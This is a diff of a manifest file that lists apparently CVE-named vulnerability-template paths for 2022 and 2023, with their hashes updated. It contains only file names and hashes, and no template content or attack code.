http/cves/2022/CVE-2022-4117.yaml:fe7d6f31f507cea2d5488b3e8b113b5ee72aac31 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 -http/cves/2022/CVE-2022-41412.yaml:f68d560012b845d03c1cd35499d515c23f84557b -http/cves/2022/CVE-2022-41441.yaml:33b8b30ae24fa8b4901f182ea309bf305d6e8772 -http/cves/2022/CVE-2022-41473.yaml:d5a4062f6f26adbc48baf0462bf4603fc139badf +http/cves/2022/CVE-2022-41412.yaml:a184237c60df53a8b29f094a9551efc5fc53dd89 +http/cves/2022/CVE-2022-41441.yaml:9cd99a5235e843a62ee0d2e0d8fdd40f573f8265 +http/cves/2022/CVE-2022-41473.yaml:c2b424cd700ff73b00da53c498b1af7648835dec http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 -http/cves/2022/CVE-2022-42094.yaml:e94ba13620cdb856263351e55446f3e94eb9f1a6 +http/cves/2022/CVE-2022-42094.yaml:62bafc8731060c6187e75e531a708217d86c3628 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 http/cves/2022/CVE-2022-42096.yaml:92ec793355e55f7b192e39a6e580494a01014cda -http/cves/2022/CVE-2022-42233.yaml:bcae576684347ef4fa61cbf1fe07e58f386d17b9 +http/cves/2022/CVE-2022-42233.yaml:28ba5b78b7e7b274f9c1a75ef74bf5c1906ad3d2 http/cves/2022/CVE-2022-4260.yaml:99c2043ef60f9781825d9e38553528884a3947d9 -http/cves/2022/CVE-2022-42746.yaml:45371e2376ef6cefe289ca3a5df2c7099b2da6a6 -http/cves/2022/CVE-2022-42747.yaml:b7e8d8f4fd5aa795f7205614a6f48cfbce32b67c -http/cves/2022/CVE-2022-42748.yaml:0cf8b77d4212697e6e937f554aa662323d7d5e88 -http/cves/2022/CVE-2022-42749.yaml:1a52d6a2a1532be5a351f810c107d8f4e1e6521c -http/cves/2022/CVE-2022-4295.yaml:55b0525163e7a256407d5eb5b1bfd8ab008bd9bf +http/cves/2022/CVE-2022-42746.yaml:878d9248b7d6781f653a58a8ced0fc29bb1988cc +http/cves/2022/CVE-2022-42747.yaml:95e40717d0b27216ae9dae57a6700e04a18f773e +http/cves/2022/CVE-2022-42748.yaml:cbb59dd20af7fdcb8062ac3cfa3ec441ccb4cc92 +http/cves/2022/CVE-2022-42749.yaml:d3ec39ebb6df66b127fb94a2e125b657ef5f33ae +http/cves/2022/CVE-2022-4295.yaml:73ac61a821f31235a584327bc1748c57ccfec2b5 http/cves/2022/CVE-2022-4301.yaml:2b4e767bd84ebd4a1c84368b804c469efd73bad7 -http/cves/2022/CVE-2022-43014.yaml:37d2fb58d33f490535b3ae10b56b0554147a3edd -http/cves/2022/CVE-2022-43015.yaml:be34d85ee1f95cf3a2546e46125a877eb1ffe568 -http/cves/2022/CVE-2022-43016.yaml:bb64a14681afc483fd2b189114d9ab7acfe00eff -http/cves/2022/CVE-2022-43017.yaml:9fb50ff91195d8ad52066b10ec43cede2a6cbca0 -http/cves/2022/CVE-2022-43018.yaml:2577afad7de6dd76a2f57ce6c62c64f2a4859528 -http/cves/2022/CVE-2022-4305.yaml:3fdae924b0e1bb86f890aa7af9d5ffebafe40aaa +http/cves/2022/CVE-2022-43014.yaml:2f7c99b78458c7da0eb20ab5f751d8719858974b +http/cves/2022/CVE-2022-43015.yaml:689d3fd673aaf207091bd627add45ea3ef69d6a0 +http/cves/2022/CVE-2022-43016.yaml:17eefbfd18302c4f78f534ef2761b68fda2bf96b +http/cves/2022/CVE-2022-43017.yaml:bb211b3765ce5c9377bdf71ba0b269da274334a3 +http/cves/2022/CVE-2022-43018.yaml:cd1fbeb1d0be46f8df56e60142442d41b35b2b3c +http/cves/2022/CVE-2022-4305.yaml:eca5f184cd75e1659ffd82a139678bb0535558a7 http/cves/2022/CVE-2022-4306.yaml:4c3e9abf755bb6c3b6ed837fedbfef8364275064 -http/cves/2022/CVE-2022-43140.yaml:0b17320e6b8497c31d43fda8b38295351387d2f4 +http/cves/2022/CVE-2022-43140.yaml:93bffbf70e9faf746ccf8146ec7f60bd9884a0dd http/cves/2022/CVE-2022-43164.yaml:d3655a1cc57f43bd824bea05e8b07b6715aac620 -http/cves/2022/CVE-2022-43165.yaml:a82ce35edbca18a4a66a28ad31b2ad30bf0b5455 -http/cves/2022/CVE-2022-43166.yaml:5783024d04cfa0a5151fa4415df376558a43236a +http/cves/2022/CVE-2022-43165.yaml:174e9c2332fa2296ec8c091f10e0dfe744b20526 +http/cves/2022/CVE-2022-43166.yaml:acc6c9f52cf0dc1cec20cc0ec7472676b61a7018 http/cves/2022/CVE-2022-43167.yaml:ed99223862bbeca7a59f9b256d3e83a36d888866 http/cves/2022/CVE-2022-43169.yaml:886425b04de1990ae8765ac89eeea1dc12112f4c http/cves/2022/CVE-2022-43170.yaml:9197f87eeaf16c75cffb3b4c5f81464bc925350d http/cves/2022/CVE-2022-43185.yaml:e2948f0b914fc30b8a09db4ebff35960884ef5f7 http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 -http/cves/2022/CVE-2022-4321.yaml:fa7154c7a1774e884087d6c5d65204aafa773867 +http/cves/2022/CVE-2022-4321.yaml:83e456c1812d8c7529ac7680165f1558cb4cd635 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:049ee24edce0e7c6b77f93ab767865f0bf7a4e30 +http/cves/2022/CVE-2022-43769.yaml:d42efbde4131de0b9bd35f085ab823bc970d4ff0 http/cves/2022/CVE-2022-44290.yaml:c1846eb89065149403e96318b7de144c6fa807a9 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb http/cves/2022/CVE-2022-4447.yaml:9a4bef58f543b34699e05028a6b018ccf8ed7271 -http/cves/2022/CVE-2022-44877.yaml:65addb2099f78a557e4d2025c0499bc45d4086c9 -http/cves/2022/CVE-2022-44944.yaml:97bb24d579fd6711c91904b7601eea135e6191d1 -http/cves/2022/CVE-2022-44946.yaml:604674f25712575a79c8e2641731bfd9cbb3fa46 +http/cves/2022/CVE-2022-44877.yaml:53d1b3d5c18d3c726bc960e7833e346c910dc34b +http/cves/2022/CVE-2022-44944.yaml:aaf6c8b3626d68166be90ae794610aa2a51c475a +http/cves/2022/CVE-2022-44946.yaml:a940720ecbc5a93b2e958af44b93b478050d0bcc http/cves/2022/CVE-2022-44947.yaml:16f643d647217ef1d75424f3fbd3d6c5ad271713 http/cves/2022/CVE-2022-44948.yaml:f415128131697bb9cb617ca11fe51e255cbb9a40 http/cves/2022/CVE-2022-44949.yaml:83a365b7ce07bcc5ecd989fb324f338a6caadca6 -http/cves/2022/CVE-2022-44950.yaml:189ebb0f87e4daf6feb36dc271706295bf0dba13 +http/cves/2022/CVE-2022-44950.yaml:c839fa92998bc8a7bcd1ac86763732d92ad0b30b http/cves/2022/CVE-2022-44951.yaml:549fa91cda9f41aa5044a57761109a3982e307fc http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45354.yaml:3805cd0d0be4230b9fe827bd0b9b392098de9765 +http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 -http/cves/2022/CVE-2022-45365.yaml:68eac7ed59da1c278d608e1100998cb36761c39f +http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 http/cves/2022/CVE-2022-45805.yaml:a049af1b44e8af0e4df790d0ddc6396f07f0187a -http/cves/2022/CVE-2022-45835.yaml:04fd898e50897154f6a405a5fd39e31ac301ce15 -http/cves/2022/CVE-2022-45917.yaml:82dbe394d156806c65243012feb0965f39f117ee -http/cves/2022/CVE-2022-45933.yaml:2f04ea871e5282032d3fd2afc55e47c7b2a576b0 +http/cves/2022/CVE-2022-45835.yaml:8a081814557b79edf22a83bfb0a827771088704b +http/cves/2022/CVE-2022-45917.yaml:61c7b1e4aea504a6200608daf06cd0dabd9aac11 +http/cves/2022/CVE-2022-45933.yaml:d2e93f82eeb07d6d4a8446561e445f4ac0add991 http/cves/2022/CVE-2022-46020.yaml:8d67b335554da18fb41c72bdbab3aa132081c167 -http/cves/2022/CVE-2022-46071.yaml:af91b64580f1176cfa545a6e29d7c25336abf583 +http/cves/2022/CVE-2022-46071.yaml:ad5e91fced76f95d8cbf9f8f3ae34441a5f7f082 http/cves/2022/CVE-2022-46073.yaml:6a2be60284f109569a84565b31582bfb709c96e3 -http/cves/2022/CVE-2022-46169.yaml:04f274527c32a4ef90910db5b14c53286f1477a4 -http/cves/2022/CVE-2022-46381.yaml:48afc500b14e4ee746c4a8f978ce67cbba12b081 -http/cves/2022/CVE-2022-46443.yaml:4cf883b55a292a82f12080098b4a322d8b48e892 +http/cves/2022/CVE-2022-46169.yaml:549ceebc2689b1f32f4a47e3447409f73022e034 +http/cves/2022/CVE-2022-46381.yaml:ecd7c6ebd267aedd5aecf04510e832b8151c8115 +http/cves/2022/CVE-2022-46443.yaml:c46f4294316aa8ef9fab6f6e9238921e4223a907 http/cves/2022/CVE-2022-46463.yaml:5484def361a7ff3c709b12195a28a14089974358 -http/cves/2022/CVE-2022-46888.yaml:18f66c9c668a5eaff2bdc1f4712f9f6a90601a99 -http/cves/2022/CVE-2022-46934.yaml:269ee818b3dd27daf9a256e33ed4e37fff58a713 -http/cves/2022/CVE-2022-47002.yaml:cb63fa544598812b17868fffb5efd8be2fb14043 -http/cves/2022/CVE-2022-47003.yaml:c9a28e29afdc49e53da85d9b01a2173cd99d51fa +http/cves/2022/CVE-2022-46888.yaml:127d708c5368d808edc0ffc670e2612e907a8919 +http/cves/2022/CVE-2022-46934.yaml:5fecc3e5e8241590c540ad5354eed2bcd8a78ddf +http/cves/2022/CVE-2022-47002.yaml:c66e3d72570143fc51e48a79ae0eeef7253bd9cf +http/cves/2022/CVE-2022-47003.yaml:8b3ac48b4837ac194711a4c4ee8a479594e4d15f http/cves/2022/CVE-2022-47075.yaml:c1678eb8b857134451836ce2b5f593dd7c05aff4 -http/cves/2022/CVE-2022-47501.yaml:350942e2cc9df574404870a956e3771d49b83d21 -http/cves/2022/CVE-2022-47615.yaml:3a6f5902d3db5524ae59494e02e81d51f5da37da -http/cves/2022/CVE-2022-47945.yaml:b71d75bd35f0652a5c2e9bf29e662af4de98999e -http/cves/2022/CVE-2022-47966.yaml:eabfb8ab9027a25256d730ee541f4c9c0beacf0c -http/cves/2022/CVE-2022-47986.yaml:f13024a610a98afc8d1092c86ee01c7fad302987 -http/cves/2022/CVE-2022-48012.yaml:aa700886a377524252e6b99ba9eb4635a05f02a1 +http/cves/2022/CVE-2022-47501.yaml:4edf127d377cdad14b5f5a8a67b00834ea827580 +http/cves/2022/CVE-2022-47615.yaml:67362902366c038a66ef9c0f62128c6daf9a87c1 +http/cves/2022/CVE-2022-47945.yaml:becb81370682f9d3133a49f814d735377cd72334 +http/cves/2022/CVE-2022-47966.yaml:01ca714713936ef513f6c4747bd92180c7c31a81 +http/cves/2022/CVE-2022-47986.yaml:3ba1347a3de62cef5a1e048c87f01a82a982d2cc +http/cves/2022/CVE-2022-48012.yaml:bbf907da09b433c1176477b9082d557e8c62c83d http/cves/2022/CVE-2022-48165.yaml:0d30e08a304606adecb631a940f674bfa06f8b46 -http/cves/2022/CVE-2022-48197.yaml:ebb8d718df47a31131c05088ffca84512e484321 +http/cves/2022/CVE-2022-48197.yaml:746b4e1a42665c576109c04cfd180ff0b810f5cf http/cves/2022/CVE-2022-4897.yaml:92f778ba997e0d796420c1236682069f0b0f9779 http/cves/2023/CVE-2023-0099.yaml:cdfed327c29ff370e6b06c37aa366dab18e1165f http/cves/2023/CVE-2023-0126.yaml:6622dccea76462d0952ff1db6e35da809393d97a -http/cves/2023/CVE-2023-0159.yaml:e5454486ab9219d366ec7769290cd2ca4f880065 +http/cves/2023/CVE-2023-0159.yaml:a85107774c5ea63b6f61096087ecf6c5555e60fe http/cves/2023/CVE-2023-0236.yaml:59baf08b76758762d47f413d236485cf5b319dce http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:21e6813e4bf43dfeb5bff97b87278784c9486236 +http/cves/2023/CVE-2023-0297.yaml:075f7dc39d64a5511ff4471e2f77abbb87991cc2 http/cves/2023/CVE-2023-0334.yaml:e64c269ae26b3ae9cc1018c96b7c988d1ce7d16b http/cves/2023/CVE-2023-0448.yaml:602dc4fb8805fa78abee06c6aaea0e867a814943 http/cves/2023/CVE-2023-0514.yaml:b76094833ad8697323609f0e18538edda46b4526 @@ -2890,161 +2890,161 @@ http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 http/cves/2023/CVE-2023-0630.yaml:3e345bf8bc629f39a8cd585c837348d7600981bf -http/cves/2023/CVE-2023-0669.yaml:a4f649bedb10dc2c7fbb5e3495c3ef07ba288bdb -http/cves/2023/CVE-2023-0678.yaml:e1c21272ee2775d3ccca6b29b38cef8cbc988767 -http/cves/2023/CVE-2023-0777.yaml:dba43d7f9116a72868f241bce2d1f0243054b04b +http/cves/2023/CVE-2023-0669.yaml:8b9956b2b579a7e3030f18be3f3d24569cb6733c +http/cves/2023/CVE-2023-0678.yaml:425a6993c9f4095a50e255ef189c02c5cbc6c9c2 +http/cves/2023/CVE-2023-0777.yaml:5f28117981d93630dd24ebef0d1505b0237eb797 http/cves/2023/CVE-2023-0900.yaml:cbef37de88d0b61540d3d8b63c80c09960b6c21e http/cves/2023/CVE-2023-0942.yaml:fcb0811220da813890a775f5c00e2f91cf2c340b -http/cves/2023/CVE-2023-0947.yaml:f85009ff00956342fc92c472973cd76bcca3763e +http/cves/2023/CVE-2023-0947.yaml:046fceff57f0093c097c23e5c1d6d3e1c5641a04 http/cves/2023/CVE-2023-0948.yaml:c0b92cf821b6f4b80dd5135d77ad852a8049a9bb http/cves/2023/CVE-2023-0968.yaml:0f3618d7652e69aaba867716e2bdf1217430566c http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 -http/cves/2023/CVE-2023-1177.yaml:0253b83cf55c200bc6c8e68696350c7d29a0eb7a +http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 http/cves/2023/CVE-2023-1454.yaml:e0b6ba7bc52ecb2e58d67b61ca3ef3010851a0fc -http/cves/2023/CVE-2023-1496.yaml:83daed0ee1166b15eba65a2f4f0ab292c5174907 +http/cves/2023/CVE-2023-1496.yaml:a3dffd4626c1929eb68a80f04c2db3efc0e27b0d http/cves/2023/CVE-2023-1546.yaml:8c8e4f20d034c05c48d5cdd431661c5b40ef7860 -http/cves/2023/CVE-2023-1671.yaml:bba8b1827470ec1c3081a95f91d5a4e5b80b016e -http/cves/2023/CVE-2023-1698.yaml:48cb080fc7d02b424b0e968164a76b1784a06998 -http/cves/2023/CVE-2023-1719.yaml:94cec242385b19249e17104f7ab893b2428f3436 +http/cves/2023/CVE-2023-1671.yaml:bfce13b06dfca9dc2f709e5329685c243679c022 +http/cves/2023/CVE-2023-1698.yaml:9134e40af81f8088b26bc1ad2b63b77453179c88 +http/cves/2023/CVE-2023-1719.yaml:109f43d7122a1b53a284d1653b2a7b998f63f483 http/cves/2023/CVE-2023-1730.yaml:db103227ee8d88ba94638a6b952356057f095ae2 http/cves/2023/CVE-2023-1780.yaml:621e1a9e470723487065088b68c3da0d8b403231 -http/cves/2023/CVE-2023-1835.yaml:1bb6f7c8a948729ec2be90f49cbe0f7c670ed660 +http/cves/2023/CVE-2023-1835.yaml:7ab9a0bbb750d52119b8c764277bd2b2b3d7ef96 http/cves/2023/CVE-2023-1880.yaml:00d09d7b221180a15759e6629e3279c98cd53ea5 http/cves/2023/CVE-2023-1890.yaml:3330b642e76c981f041c0275e19aa44d0f3b8bd2 -http/cves/2023/CVE-2023-1892.yaml:536f1227d638780d831c10918d6623cc3b387591 -http/cves/2023/CVE-2023-20073.yaml:3a0abd96dcf4d3fbac43737fcb73fb69aeecf1b6 +http/cves/2023/CVE-2023-1892.yaml:c6ddc070c4bb0092f26c2b181f8989e23f22502e +http/cves/2023/CVE-2023-20073.yaml:40af4afb6cb90abfca3bf2d933cf96a15a7969bc http/cves/2023/CVE-2023-2009.yaml:6680fb1da94a211cbb09a77d3b19a9b4165dc8a1 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:226bf02b5318dc6cfebadd23d5aecb21c651e9c2 -http/cves/2023/CVE-2023-2059.yaml:295dbb72c980c4dc2c21032d20abe3bea8d9591a -http/cves/2023/CVE-2023-20864.yaml:2658f5f3e5e81def4c87f09ac7bb4794ee36380f -http/cves/2023/CVE-2023-20887.yaml:de34b8535e1e90d53cbc3485e08255b59eaea21b -http/cves/2023/CVE-2023-20888.yaml:e505418300ed1d09b3640e82667c2e24b93f00df -http/cves/2023/CVE-2023-20889.yaml:ccd943207b89b26addc9b511fc4169bc5ef47283 +http/cves/2023/CVE-2023-2059.yaml:28b454b92bfa0237568f5b09dae3c5d9a3a3fd19 +http/cves/2023/CVE-2023-20864.yaml:92f02b37a489e355770690251a1e03c3bf9d4653 +http/cves/2023/CVE-2023-20887.yaml:44966b90bec19e4fa0bac9a61cb3287c5c91cb5a +http/cves/2023/CVE-2023-20888.yaml:bd6a1c13757ff2fa456692f087da135cbef044c4 +http/cves/2023/CVE-2023-20889.yaml:725ac833dc8e144d85358409437967ad0c1566e8 http/cves/2023/CVE-2023-2122.yaml:7dca84047ac5d644ee1d20ea67b70e4bd36947ed http/cves/2023/CVE-2023-2130.yaml:314de8c387b9e0bd75dd8a98f0c7283185b83db9 http/cves/2023/CVE-2023-2178.yaml:3907c43ef047c7398dd6c6075b7eb37f81431e7f -http/cves/2023/CVE-2023-22232.yaml:7f8bb8c9e80d5cd56e74c3e3f8f340de27d5adf6 +http/cves/2023/CVE-2023-22232.yaml:e9ad9578a27839575db8e7a9095c2fab69104653 http/cves/2023/CVE-2023-2224.yaml:e0d9099e5025c8aa7b3e29c3aa6ba735e4be50f2 -http/cves/2023/CVE-2023-2227.yaml:5f5d2fb74bdf79f618c1ffbcc388552d0a630cc8 +http/cves/2023/CVE-2023-2227.yaml:d5e4f16f62c2403ec6c2267812665fdcedf3bf7f http/cves/2023/CVE-2023-22432.yaml:9dbb7e336e8db33be5b66a8eabc22e1b165014b3 -http/cves/2023/CVE-2023-22463.yaml:a3d977237ef6f8850342a6f3c60aba4a5b3a8f4d -http/cves/2023/CVE-2023-22478.yaml:884234d1677be5e49581980e5c44a6005dfc1a3c -http/cves/2023/CVE-2023-22480.yaml:127f233495311a1d651f000f0c9e5ac4032264b4 -http/cves/2023/CVE-2023-22515.yaml:f54b3ac53cf7b5b47ac460018b6f7e1ee0c6badb -http/cves/2023/CVE-2023-22518.yaml:db77490e60bc45bbcd971a93a24ebe27742aeff6 -http/cves/2023/CVE-2023-2252.yaml:8218e5866dbbc4f8ab4c792eb29410c1b6928863 -http/cves/2023/CVE-2023-22527.yaml:5a398da4d8c11f0e15366f5357269a8e316edc26 -http/cves/2023/CVE-2023-22620.yaml:75e9d1795037ad70c56c152a05b3b3634e5a286b +http/cves/2023/CVE-2023-22463.yaml:4b680be5a67a34e68446d6b9562c4ceff856e47b +http/cves/2023/CVE-2023-22478.yaml:55579f0bca74df6d4733c58b98359aafea0ce67d +http/cves/2023/CVE-2023-22480.yaml:175fc0cb707bc796ed639249eadc649b41c2e9a1 +http/cves/2023/CVE-2023-22515.yaml:475659bd24499fd8eb88a9cbb9da90e10efb878a +http/cves/2023/CVE-2023-22518.yaml:780517d3d7dc79293ac006bb257411b452e597ca +http/cves/2023/CVE-2023-2252.yaml:321b36db997fc0a505dd01a79a9471b4bcb692e1 +http/cves/2023/CVE-2023-22527.yaml:f03d7787b1186c69d35db7079c8925f8aa5e07d2 +http/cves/2023/CVE-2023-22620.yaml:2aa0bafaecd3b3b8a9583a5cbfdd7e9c1a1cb257 http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 -http/cves/2023/CVE-2023-22897.yaml:a91c5c5c3be9a49f1571201a4aef01240b9771e8 -http/cves/2023/CVE-2023-23161.yaml:f0b2596b264e2bcc39e434df1d06f4ab8564e0dc -http/cves/2023/CVE-2023-23333.yaml:e74f3de0180bef51e8247423cfa9aac212144725 +http/cves/2023/CVE-2023-22897.yaml:b79dbca06ddb56668881397e8ded0c7189a8ca79 +http/cves/2023/CVE-2023-23161.yaml:bba84f830ad38a31c2d338fabc553dbc0e1be8b7 +http/cves/2023/CVE-2023-23333.yaml:bb8afd05703411ed6fe92a571938a6dc46183f2a http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 http/cves/2023/CVE-2023-23489.yaml:eb3988e79364bf65b6116f6040271a11ba06908d http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 -http/cves/2023/CVE-2023-2356.yaml:afbda4cc50dc61ac647a8b192446559d0b64087b -http/cves/2023/CVE-2023-23752.yaml:3b34f72b378146dbbb96a2d9ac766100355d0e32 -http/cves/2023/CVE-2023-24044.yaml:4422aee8910f6d13a0e2d1d94437ccb4cbfa23b2 -http/cves/2023/CVE-2023-24243.yaml:2e7e657f95156e38a36b316ab03afe3a4662d6c1 +http/cves/2023/CVE-2023-2356.yaml:83f12f25896993aaa17f815a0e62f12e24370a94 +http/cves/2023/CVE-2023-23752.yaml:9d9d7f45b50837196c39fda7a218d094a42af504 +http/cves/2023/CVE-2023-24044.yaml:4482941e2ad063a7e77d1cea8eb9a12716b2b959 +http/cves/2023/CVE-2023-24243.yaml:d8114d7e2422b334f5ac940ecd66811783da758c http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe -http/cves/2023/CVE-2023-24322.yaml:9565b6858c8be34bb34edf9a2ad5fd13826766ff +http/cves/2023/CVE-2023-24322.yaml:2fd2be84af2595799fe334bc21a1d270f1c96ba2 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 -http/cves/2023/CVE-2023-24488.yaml:910495eaa096525401a07f98899c7557d5d09e36 -http/cves/2023/CVE-2023-24489.yaml:d40ac2877d356166d00d3e518a0a3c8f17eba3bd -http/cves/2023/CVE-2023-24657.yaml:9f514c026f5476d711fa7038de6e6378fd564c97 -http/cves/2023/CVE-2023-24733.yaml:e3b747a31efa6f500696d63865160fc8fc31a5c9 -http/cves/2023/CVE-2023-24735.yaml:4c793e2fe7b5ad9b4abdb8e73e9b76bf051c7880 -http/cves/2023/CVE-2023-24737.yaml:f59b7ecdd1b0b4c17566980a6df3d0fa909a6800 +http/cves/2023/CVE-2023-24488.yaml:a5c38cc66dab57aac0f507d5cf2cce627199d664 +http/cves/2023/CVE-2023-24489.yaml:677c0dbdb8e2085fef691335110801590b30813e +http/cves/2023/CVE-2023-24657.yaml:1274ee6f1b432fa01a802bc1bb583c938ca9a707 +http/cves/2023/CVE-2023-24733.yaml:2a709c4774ec2a0718259d72f896efed709bc599 +http/cves/2023/CVE-2023-24735.yaml:274964d2bc4c043cd5b6c42112e7daf44010400e +http/cves/2023/CVE-2023-24737.yaml:4998778720e3020cc75dcca64a01d13e0dd21eee http/cves/2023/CVE-2023-2479.yaml:de7d8970759dbc5947842d9f907336885284dc0c -http/cves/2023/CVE-2023-25135.yaml:1ab9fd45f7f1d736b69c7ffdc3370e08f15903ab -http/cves/2023/CVE-2023-25157.yaml:ca9e024f095cd830912cd4adfedc9def802bbcd2 -http/cves/2023/CVE-2023-25194.yaml:7ec562c687c04ffacd04b7afa70791930013df1b +http/cves/2023/CVE-2023-25135.yaml:67f8a7027ae6a8d03ebdb2349be75e44038cd457 +http/cves/2023/CVE-2023-25157.yaml:028b15322f71e66921570bb661a5898c14317e60 +http/cves/2023/CVE-2023-25194.yaml:a71cb5f37dae10b973ee75d656d589364f21ddb8 http/cves/2023/CVE-2023-25346.yaml:51f024896301035a2c43b2e6e0213631707ed2b6 -http/cves/2023/CVE-2023-25573.yaml:9a546d29b2d4c155f3b557a301120c225bb0c342 -http/cves/2023/CVE-2023-25717.yaml:4f54cbfe8cc755924fbfb68614743708d5525c01 -http/cves/2023/CVE-2023-26035.yaml:ae2db8a7df2f18ef0e50762b2029456d916f22ae -http/cves/2023/CVE-2023-26067.yaml:4d1cfab6aa1f90f85042323bfa46bb334c5351f5 -http/cves/2023/CVE-2023-26255.yaml:c6fbc0183cd7910b015e51480fd7e708c52d924d -http/cves/2023/CVE-2023-26256.yaml:47475176f0cdb924b10403b22ca8082bea0e49bb -http/cves/2023/CVE-2023-26347.yaml:30c9fe77bbb6f6c62b6cc906d35b784e75e90898 -http/cves/2023/CVE-2023-26360.yaml:f67e80636fe985042dbacf1693a58bb0299e3455 +http/cves/2023/CVE-2023-25573.yaml:61df804abb43b442b0b67f88f3ab14e796ad2733 +http/cves/2023/CVE-2023-25717.yaml:9eaceb86ca88f6bb5bc47f3c30af88013e9fa8fa +http/cves/2023/CVE-2023-26035.yaml:b3e5e854b6f74b5732cfaa1afc6562c47772558a +http/cves/2023/CVE-2023-26067.yaml:adee556e3bb4fe902ade4dcd0d60c8a6393aa3a9 +http/cves/2023/CVE-2023-26255.yaml:bd1a44daff21cbb47bedcccd43738e6cf39629f8 +http/cves/2023/CVE-2023-26256.yaml:c775528d3bbb390ba0fbf72e97790db837b271f1 +http/cves/2023/CVE-2023-26347.yaml:8de8b8f4acaa0425ff2fba4780aff2d80a811bb2 +http/cves/2023/CVE-2023-26360.yaml:3a04ad927de53858d263b4c05069f33336a55088 http/cves/2023/CVE-2023-26469.yaml:d86410be29d5d94487f257b6b8928f6a2414b893 -http/cves/2023/CVE-2023-2648.yaml:fd2091f7748de8934ec2797c74c9befbb210e126 +http/cves/2023/CVE-2023-2648.yaml:115c18dc80d6995749913141a2564a18a30024d6 http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 -http/cves/2023/CVE-2023-27008.yaml:1afa339f38fafd7edca1f5b38b518a71bd8e1fca -http/cves/2023/CVE-2023-27032.yaml:8e7567e27f469ff1f189a86084e14cdaf3138d44 +http/cves/2023/CVE-2023-27008.yaml:89f280cda02c4427fcf219fa854932e9afe579b8 +http/cves/2023/CVE-2023-27032.yaml:00d48c87fdf5444e3c3110e2d4a58e82106b4b2a http/cves/2023/CVE-2023-27034.yaml:81fe9d019fa4529576ca3e6ce5723d93c9a08b44 -http/cves/2023/CVE-2023-27159.yaml:5e99bfa993b51624cf7f3cf312f2ae46f4f4ccbc +http/cves/2023/CVE-2023-27159.yaml:e7089fce651bf330cc93fb75775796211008035e http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 -http/cves/2023/CVE-2023-27292.yaml:01cfbfff3615c3217b23d0f0fa441e3d30b1ce69 -http/cves/2023/CVE-2023-2732.yaml:b317d1e348b3f1fbebfe190683edccb5fc40d144 -http/cves/2023/CVE-2023-27350.yaml:40d80f8bd6f9e7236e3e09edb7a216ddf8de0a45 -http/cves/2023/CVE-2023-27372.yaml:b42ee971a27826c802ac49df5a67f34b6207c925 -http/cves/2023/CVE-2023-27482.yaml:ebb63a159ae1f48b1110c55ea419a7323289c670 -http/cves/2023/CVE-2023-27524.yaml:ff8bf52fbb718a7f0f899d13b4699fe964de5d4a +http/cves/2023/CVE-2023-27292.yaml:997c516c2037ee0b3607afa2074852e4ea30006e +http/cves/2023/CVE-2023-2732.yaml:11e26b78fa85fce67c34d0eefd6618c623877121 +http/cves/2023/CVE-2023-27350.yaml:a43f57ff8228059eb2a306fb132f00703345fd43 +http/cves/2023/CVE-2023-27372.yaml:227ea724004afbd6d9cf8b4a1b7313c6899ac2d5 +http/cves/2023/CVE-2023-27482.yaml:4dcd5d4757cf4ab7476d8b0436657bafced2faa4 +http/cves/2023/CVE-2023-27524.yaml:9cb4f6816bbd3a4f79d270f62ec0421e8bd514fe 